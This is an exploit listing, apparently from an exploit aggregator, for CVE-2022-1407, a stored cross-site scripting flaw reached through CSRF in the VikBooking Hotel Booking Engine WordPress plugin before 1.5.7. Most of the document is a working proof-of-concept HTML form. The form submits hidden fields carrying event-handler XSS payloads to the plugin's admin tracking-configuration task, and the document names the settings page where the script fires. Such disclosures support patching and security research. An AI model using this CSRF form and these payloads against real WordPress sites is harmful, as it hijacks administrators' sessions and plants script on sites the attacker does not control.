Exploit for VikBooking Hotel Booking Engine & PMS < 1.5.7 - Stored Cross-Site Scripting via CSRF CVE-2022-1407

Name: Exploit for VikBooking Hotel Booking Engine & PMS < 1.5.7 - Stored Cross-Site Scripting via CSRF CVE-2022-1407
Rating: 5 (135 reviews)

2022-04-21 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:19A9E266-DAF6-4CC5-A300-2B5436B6D07D
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?option=com_vikbooking" method="POST">
      <input type="hidden" name="trkenabled" value="1" />
      <input type="hidden" name="trkcookierfrdur" value="3" />
      <input type="hidden" name="trkcampname[]" value='Test"style=animation-name:rotation onanimationstart=alert(/XSS-Name/)//' />
      <input type="hidden" name="trkcampkey[]" value='"style="animation-name:rotation" onanimationstart="alert(/XSS-Key/)//' />
      <input type="hidden" name="trkcampval[]" value='"style=animation-name:rotation onanimationstart=alert(/XSS-Key-Value/)//' />
      <input type="hidden" name="option" value="com_vikbooking" />
      <input type="hidden" name="task" value="savetrkconfigstay" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

XSS will be triggered in the Statistics Tracking Settings: https://example.com/wp-admin/admin.php?option=com_vikbooking&task=trkconfig